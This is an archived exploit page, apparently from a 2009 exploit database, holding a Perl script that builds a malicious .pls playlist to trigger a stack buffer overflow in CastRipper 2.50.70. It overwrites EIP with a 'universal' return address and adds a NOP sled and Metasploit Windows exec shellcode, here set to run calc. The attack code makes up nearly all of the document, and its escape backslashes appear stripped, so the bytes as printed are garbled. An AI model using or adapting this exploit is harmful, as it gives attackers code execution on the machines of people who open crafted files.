CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit
# Published : 2009-05-12
# Author : zAx
# Previous Title : CastRipper 2.50.70 (.m3u) Universal Stack Overflow Exploit (py)
# Next Title : MPLAB IDE 8.30 (.mcp) Universal Seh Overwrite Exploit

#!/usr/bin/perl
# CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit
# Exploited By : zAx
# ThE-zAx@HoTMaiL.CoM
print "CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploitn";
print "Exploited By : zAx";
print "Contact at : ThE-zAx@HoTMaiL.CoM";
$header = "[playlist]x0ANumberOfEntries=1x0AFile1=http://";
$junk = "x41" x 26369;
$eip="x7DxBCx01x10"; # Universal
$nopsled = "x90" x 10;
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x88".
"xd3x37xccx83xebxfcxe2xf4x74x3bx73xccx88xd3xbcx89".
"xb4x58x4bxc9xf0xd2xd8x47xc7xcbxbcx93xa8xd2xdcx85".
"x03xe7xbcxcdx66xe2xf7x55x24x57xf7xb8x8fx12xfdxc1".
"x89x11xdcx38xb3x87x13xc8xfdx36xbcx93xacxd2xdcxaa".
"x03xdfx7cx47xd7xcfx36x27x03xcfxbcxcdx63x5ax6bxe8".
"x8cx10x06x0cxecx58x77xfcx0dx13x4fxc0x03x93x3bx47".
"xf8xcfx9ax47xe0xdbxdcxc5x03x53x87xccx88xd3xbcxa4".
"xb4x8cx06x3axe8x85xbex34x0bx13x4cx9cxe0x23xbdxc8".
"xd7xbbxafx32x02xddx60x33x6fxb0x56xa0xebxd3x37xcc";
open(zax,">>zAx.pls");
print zax $header.$junk.$eip.$nopsled.$shellcode;
print "[+] Done !! [+]";
close(zax);

# www.Syue.com [2009-05-12]